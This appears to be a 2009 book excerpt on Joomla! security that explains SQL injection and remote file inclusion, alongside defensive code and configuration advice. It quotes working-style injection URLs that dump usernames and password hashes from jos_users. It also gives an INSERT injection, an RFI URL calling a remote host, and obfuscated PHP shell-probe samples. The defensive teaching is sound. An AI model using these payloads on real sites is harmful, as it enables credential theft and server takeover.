- SQL Injection and blind SQL Injection
- Incorrect or ignored PHP configuration settings
- Divulging too much in error messages and poor error handling
- Cross Site Scripting (XSS)
- Cross Site Request Forgery, that is, CSRF (one-click attack)

SQL Injections

SQL databases are the heart of the Joomla! CMS. The database holds the content, the users' IDs, the settings, and more. Gaining access to this valuable resource is the ultimate prize of the hacker. Accessing it can provide administrative access, which can expose private information such as usernames and passwords, and can allow any number of bad things to happen.

When you make a request for a page on Joomla!, it forms a "query", or a question, for the database. The database does not suspect that you may be asking a malformed question and will attempt to process whatever the query is. Often, developers do not construct their code to watch for this type of attack. In fact, in the month of February 2008 alone, twenty-one new SQL Injection vulnerabilities were discovered in the Joomla! ecosystem. The following are some examples, presented for your edification. Using any of these for any purpose is solely your responsibility and not mine.

Example 1

index.php?option=com_****&Itemid=name&cmd=section&section=-000/**/union+select/**/000,111,222,concat(username,0x3a,password),0,concat(username,0x3a,password)/**/from/**/jos_users/*

Example 2

index.php?option=com_****&task=****&Itemid=name&catid=97&aid=-9988%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),0x3a,password,0x3a,username,0,0,0,0,1,1,1,1,1,1,1,1,0,0,0/**/from/**/jos_users/*

Both of these will reveal, under the right set of circumstances, the usernames and passwords in your system. There is a measure of protection in Joomla! 1.0.13, with an encryption scheme that will render the passwords useless. However, it does not make sense to allow vulnerable extensions to remain; yielding ANY kind of information like this is unacceptable.

The following screenshot displays the results of the second example running on a test system with the vulnerable extension. The two pieces of information are the username, which is listed as Author, and the hex string (partially blurred), which is the hashed password:

You can see that not all MD5 hashes can be broken easily. Though it won't be shown here, there is a website available where you enter your hash and it attempts to crack it. It supports several popular hashes. When I entered this hash (of a password) into the tool, I found the password to be Anthony. It's worth noting that this hash and its password are the result of a website getting broken into, prompting the user to search for the "hash" left behind, thus yielding the password. The important news, however, is that if you are using Joomla! 1.0.13 or greater, the password's hash is now calculated with a "salt", making it nearly impossible to break.
However, the standard MD5 could still be broken with enough effort in many cases. For more information about salting and MD5, see http://www.php.net/md5. For an interesting read on salting, you may wish to visit www.governmentsecurity.org/forum/lofiversion/index.php/t19179.htm.

An SQL Injection is a query put to an SQL database where data input was expected AND the application does not correctly filter the input. It allows the hijacking of database information such as usernames and passwords, as we saw in the earlier example. Most of these attacks are based on two things: first, developers make coding errors in their code, or they reuse code from another application, thus spreading the error; second, input is not adequately validated. In essence, it means trusting users to put in the RIGHT stuff, and not to put in queries meant to harm the system. User input is rarely to be trusted for this reason. It should always be checked for proper format, length, and range.

There are many ways to test for vulnerability to an SQL Injection, but one of the most common is to enter a string such as ' or 1=1 -- into an input field. In some cases, this may be enough to trigger a database into divulging details. This very simplistic example would not work in the login box that is shown. However, if it were presented to a vulnerable extension in a manner such as the following, it might work:

<FORM action=http://www.vulnerablesite.com/Search.php method=post>
<input type=hidden name=A value="me' or 1=1--">
</FORM>

This "posting" method (presented as a very generic exploit and not meant to work per se in Joomla!) will attempt to break into the database by putting forward queries that would not necessarily be noticed. But why 1=1--? According to PHP.NET, "It is a common technique to force the SQL parser to ignore the rest of the query written by the developer with --, which is the comment sign in SQL."

You might be thinking, "So what if my passwords are hashed? They can get them but they cannot break them!" This is true, but if they wanted it badly enough, nothing keeps them from doing something such as this:

INSERT INTO jos_mydb_users ('email','password','login_id','full_name')
VALUES ('johndoe@email.com','default','Jdoe','John Doe');--';

This code has the potential to do harm if inserted into a query such as this:

http://www.yourdomain/vulnerable_extension//index.php?option=com_vulext INSERT INTO jos_mydb_users ('email','password','login_id','full_name') VALUES ('johndoe@email.com','default','Jdoe','John Doe');--';

Again, this is a completely bogus example and is not likely to work. But if you can get an SQL DB to divulge its information, you can get it to "accept" (insert) information it should not as well.
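The root cause in all of these examples is that user input reaches the SQL parser as part of the query text. A common defence, sketched below with PHP's PDO extension rather than Joomla!'s own database API, is to bind user input as parameters so the database never interprets it as SQL. The database name, credentials, and column names here are illustrative only.

<?php
// Hypothetical lookup: the user-supplied value is bound as a parameter,
// so a payload such as "me' or 1=1--" is treated as a literal string,
// not as SQL.
$pdo = new PDO('mysql:host=localhost;dbname=joomla_db', 'dbuser', 'dbpass');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);

$username = isset($_POST['username']) ? $_POST['username'] : '';

$stmt = $pdo->prepare('SELECT id, username FROM jos_users WHERE username = :name');
$stmt->execute(array(':name' => $username));

$row = $stmt->fetch(PDO::FETCH_ASSOC);
if ($row === false) {
    echo "No such user\n";
} else {
    echo "Found user id " . (int) $row['id'] . "\n";
}
?>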

Preventing Remote File Includes Attack on your Joomla Websites

Packt
15 Oct 2009
7 min read
PHP is an open-source server-side scripting language. It is the basis of many web applications, and it works very nicely with database-driven platforms such as Joomla!. Since Joomla! is growing and its popularity is increasing, malicious hackers are looking for holes. The development community has the prime responsibility to produce the most secure extensions possible; in my opinion, this comes before usability, accessibility, and so on. After all, if a beautiful extension has some glaring holes, it won't be usable. The administrators and site development folks have the next layer of responsibility: to ensure that they have done everything they can to prevent attacks by checking crucial settings, patching, and monitoring logs. If these two are combined and executed properly, they will result in secure web transactions.

SQL Injections, though very nasty, can be prevented in many cases; an RFI attack, however, is more difficult to stop altogether. So it is important that you are aware of these attacks and know their signs.

Remote File Includes

An RFI vulnerability exists when an attacker can insert a script or code into a URL and command your server to execute the evil code. It is important to note that File Inclusion attacks such as these can mostly be mitigated by turning Register_Globals off. Turning this off ensures that the $page variable is not treated as a super-global variable, and thus does not allow an inclusion.

The following is a sanitized attempt to attack a server in just such a manner:

http://www.exampledomain.com/?mosConfig_absolute_path=http://www.forum.com/update/xxxxx/sys_yyyyy/i?

If the site in this example did not have appropriate safeguards in place, the following code would be executed:

$x0b="inx72_147x65x74"; $x0c="184rx74o154x6fwex72"; echo "c162141156kx5fr157cx6bs";if (@$x0b("222x61x33e_x6d144e") or $x0c(@$x0b("x73ax66x65_mx6fde")) == "x6fx6e"){ echo "345a146x65155od145x3ao156";}else{echo "345a146ex6dox64e:x6ffx66";}exit(); ?>

This code is from a group that calls itself "Crank". The purpose of this code is not known, and therefore we do not want it executed on our site. This attempt to insert the code appears to want my browser to execute something and report one thing or another:

{echo "345a146x65155od145x3ao156";}else{ echo "345a146ex6dox64e:x6ffx66";}exit();

Here is another example of an attempted script. This one is in PHP, and would attempt to execute in the same fashion by making an insertion on the URL:

<html><head><title>/// Response CMD ///</title></head><body bgcolor=DC143C><H1>Changing this CMD will result in corrupt scanning !</H1></html></head></body><?phpif((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){echo("Safe Mode of this Server is : ");echo("SafemodeOFF");}else{ini_restore("safe_mode");ini_restore("open_basedir");if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){echo("Safe Mode of this Server is : ");echo("SafemodeOFF");}else{echo("Safe Mode of this Server is : ");echo("SafemodeON");}}...@ob_end_clean();}elseif(@is_resource($f = @popen($cfe,"r"))){$res = "";while(!@feof($f)) { $res .= @fread($f,1024); }@pclose($f);}}return $res;}exit;

This sanitized example wants to learn whether we are running SAFE MODE on or off, and would then attempt to start a command shell on our server. If the attackers are successful, they will gain access to the machine and take over from there. For Windows users, a command shell is equivalent to running START | RUN | CMD, thus opening what we would call a "DOS prompt".
Other methods of attack include the following:

- Evil code uploaded through session files or through image uploads.
- The insertion or placement of code that you might think would be safe, such as compressed audio streams. These do not get inspected as they should be, and could allow access to remote resources. It is noteworthy that this can slip past even if you have set allow_url_fopen or allow_url_include to disabled.
- Taking input from the request POST data rather than from a data file.

There are several other methods beyond this list, and judging from the traffic at my sites, the list and methods change on an "irregular" basis. This highlights our need for a robust security architecture, and the need to be very careful in accepting user input on our websites.

The Most Basic Attempt

You don't always need heavy or fancy code as in the earlier examples. Just appending a page request of sorts to the end of our URL will do it. Remember this?

/?mosConfig_absolute_path=http://www.forum.com/update/xxxxx/sys_yyyyy/i?

Here we're instructing the server to force the path in our environment to change to match the code located out there. Here is such a "shell":

<?php
$file = $_GET['evil-page'];
include($file . ".php");
?>

What Can We Do to Stop This?

As stated repeatedly, defence in depth is the most important of design considerations. Putting up many layers of defence will enable you to withstand attacks. This type of attack can be defended against at the .htaccess level and by filtering the inputs (a minimal whitelist sketch follows at the end of this section).

One problem is that we tend to forget that many defaults in PHP set up a condition for failure. Take this for instance: allow_url_fopen is on by default. "Default? Why do you care?" you may ask. If enabled, this allows the PHP file functions, such as file_get_contents() and the ever-present include and require statements, to work in a manner you may not have anticipated, such as retrieving the entire contents of your website, or allowing a determined attacker to break in.

Programmers sometimes forget to do proper input filtering in their user fields, such as an input box that allows any type of data to be entered or code to be inserted for an injection attack. Lots of site break-ins, defacements, and worse are the result of a combination of poor programming on the coder's part and not disabling the allow_url_fopen option. This leads to code injections as in our previous examples.

Make sure you keep the Global Registers OFF. This is a biggie that will prevent much evil! There are a few ways to do this and, depending on your version of Joomla!, they are handled differently. In Joomla! versions earlier than 1.0.13, look for this code in globals.php:

// no direct access
defined( '_VALID_MOS' ) or die( 'Restricted access' );

/*
 * Use 1 to emulate register_globals = on
 * WARNING: SETTING TO 1 MAY BE REQUIRED FOR BACKWARD COMPATIBILITY
 * OF SOME THIRD-PARTY COMPONENTS BUT IS NOT RECOMMENDED
 *
 * Use 0 to emulate register_globals = off
 * NOTE: THIS IS THE RECOMMENDED SETTING FOR YOUR SITE BUT YOU MAY
 * EXPERIENCE PROBLEMS WITH SOME THIRD-PARTY COMPONENTS
 */
define( 'RG_EMULATION', 0 );

Make sure RG_EMULATION is set to ZERO (0) instead of one (1). When installed out of the box, it is 1, meaning register_globals is set to on. In Joomla! 1.0.13 and greater (in the 1.x series), look for this field in the GLOBAL CONFIGURATION | SERVER tab:

Have you upgraded from an earlier version of Joomla!? Affects: Joomla! 1.0.13 to 1.0.14
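As promised above, here is a minimal sketch of the input-filtering idea: instead of including whatever page name arrives in the URL, the script only ever includes files from a fixed whitelist. The page names and file paths are hypothetical, and a real Joomla! extension would normally go through the framework's own loading mechanisms rather than raw include() calls.

<?php
// Whitelist of pages this script is allowed to include. Anything not in
// this map - including remote URLs such as http://evil.example/shell.php -
// is rejected outright.
$allowedPages = array(
    'home'    => 'pages/home.php',
    'contact' => 'pages/contact.php',
    'news'    => 'pages/news.php',
);

$requested = isset($_GET['page']) ? $_GET['page'] : 'home';

if (array_key_exists($requested, $allowedPages)) {
    // The include path comes from our own map, never from user input.
    include dirname(__FILE__) . '/' . $allowedPages[$requested];
} else {
    header('HTTP/1.0 404 Not Found');
    echo 'Unknown page';
}
?>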